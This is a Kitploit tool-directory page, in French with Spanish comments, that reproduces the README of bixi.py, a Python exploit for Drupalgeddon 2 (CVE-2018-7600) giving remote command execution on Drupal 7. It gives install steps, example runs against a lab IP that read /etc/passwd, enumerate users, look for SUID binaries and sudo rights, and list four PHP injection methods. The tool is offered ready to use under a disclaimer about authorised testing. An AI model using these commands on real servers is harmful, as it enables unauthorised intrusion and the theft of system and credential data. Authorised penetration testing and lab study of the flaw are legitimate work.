Skip to content
KitploitKITPLOIT
OutilsBlog
Log in
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Drupalgeddon2-CVE-2018-7600 — Exploit Python pour CVE-2018-7600 (Drupalgeddon 2) permettant l'exécution de code à distance sur Drupal 7 avec plusieurs méthodes d'injection et des commandes prédéfinies pour Linux et Windows. | Kitploit
Outils/GitHubGitHub/bixipro/drupalgeddon2-cve-2018-7600
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionCommandement et ContrôleApprentissage et Éducation
GitHubbixipro/drupalgeddon2-cve-2018-7600

Drupalgeddon2-CVE-2018-7600

Exploit Python pour CVE-2018-7600 (Drupalgeddon 2) permettant l'exécution de code à distance sur Drupal 7 avec plusieurs méthodes d'injection et des commandes prédéfinies pour Linux et Windows.

Voir le dépôt
5il y a 7 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

🔥 Exploit Drupalgeddon 2 — bixi.py

📖 Description

bixi.py est un exploit pour la vulnérabilité CVE‑2018‑7600 (Drupalgeddon 2) qui affecte Drupal 7. Il permet l'exécution de commandes à distance (RCE) sur des serveurs Drupal vulnérables via une interface intuitive et des commandes prédéfinies.


⚠️ DISCLAIMER / AVIS LÉGAL

CE LOGICIEL EST UNIQUEMENT À DES FINS ÉDUCATIVES ET DE RECHERCHE DANS DES ENVIRONNEMENTS CONTRÔLÉS.

  • Utiliser uniquement sur les systèmes que vous possédez ou pour lesquels vous avez une autorisation écrite de tester
  • L'utilisation non autorisée est ILLÉGALE et peut entraîner des conséquences pénales
  • L'auteur décline toute responsabilité en cas de mauvaise utilisation de cet outil
  • Respectez toujours les lois locales et internationales en matière de cybersécurité

"With great power comes great responsibility"


📋 Caractéristiques

  • ✅ Exploitation automatique de CVE‑2018‑7600
  • ✅ Commandes prédéfinies pour Linux et Windows
  • ✅ Méthodes d'injection multiples (system, passthru, exec, shell_exec)
  • ✅ Interface intuitive avec système d'aide
  • ✅ Gestion robuste des erreurs et des timeouts
  • ✅ Sortie formatée et facile à lire

🚀 Installation Rapide

1. Cloner le dépôt

git clone https://github.com/bixiPRO/Drupalgeddon2-CVE-2018-7600.git
cd Drupalgeddon2-CVE-2018-7600

2. Installer les dépendances

# Kali / Debian / Ubuntu
sudo apt update
sudo apt install python3 python3-pip -y
pip3 install requests

# Otras distribuciones
pip3 install requests

3. Donner les permissions d'exécution

chmod +x bixi.py

🎯 Utilisation de Base

Voir l'aide complète

python3 bixi.py --help

Syntaxe générale

python3 bixi.py <URL> <COMANDO/PALABRA_CLAVE> [INJECTION_TYPE]

Exemples pratiques

# Verificar vulnerabilidad
python3 bixi.py http://10.99.99.6/drupal/ test

# Detectar sistema operativo
python3 bixi.py http://10.99.99.6/drupal/ linux
python3 bixi.py http://10.99.99.6/drupal/ windows

# Enumerar usuarios
python3 bixi.py http://10.99.99.6/drupal/ users_linux
python3 bixi.py http://10.99.99.6/drupal/ net_user

# Información del sistema
python3 bixi.py http://10.99.99.6/drupal/ ifconfig
python3 bixi.py http://10.99.99.6/drupal/ ipconfig

# Comandos personalizados
python3 bixi.py http://10.99.99.6/drupal/ "cat /etc/passwd"
python3 bixi.py http://10.99.99.6/drupal/ "whoami /all"

📊 Mots-clés Prédéfinis

🐧 Linux

CommandeDescription
linuxInformations système
users_linuxLister les utilisateurs
idInfos utilisateur/groupes
lsLister les fichiers
ifconfigInfos réseau
find_flagRechercher des flags

🪟 Windows

CommandeDescription
windowsInformations système
net_userLister les utilisateurs
whoami_winInfos détaillées
ipconfigRéseau
netstat_winConnexions
dirLister le répertoire

🔧 Pentesting

CommandeDescription
sudoVérifier les privilèges sudo
suidRechercher les binaires SUID
net_localgroupGroupes locaux
drupal_configRechercher les configurations
drupal_versionObtenir la version de Drupal

🎨 Méthodes d'Injection

# system (default)
python3 bixi.py http://target/ "whoami" system

# passthru
python3 bixi.py http://target/ "whoami" passthru

# exec
python3 bixi.py http://target/ "whoami" exec

# shell_exec
python3 bixi.py http://target/ "whoami" shell_exec

🏗️ Structure du Projet

drupalgeddon2-exploit/
│
├── bixi.py
├── README.md
├── requirements.txt
├── examples/
│   ├── linux_commands.txt
│   └── windows_commands.txt
└── screenshots/
    ├── help_screen.png
    └── exploit_success.png

🔧 Configuration Avancée

Proxy (facultatif)

proxies = {
    'http': 'http://127.0.0.1:8080',
    'https': 'http://127.0.0.1:8080'
}

Délai d'attente

Modifier la valeur par défaut (15 secondes) :

timeout=15

Ajouter de nouvelles commandes

Modifier le dictionnaire commands dans get_command_for_keyword().


🐛 Résolution des Problèmes

Erreur : No module named 'requests'

pip3 install requests

Erreur : Connexion refusée

# Verificar conectividad
ping TARGET_IP

# Verificar ruta Drupal
curl http://TARGET_IP/drupal/
Télécharger l’outil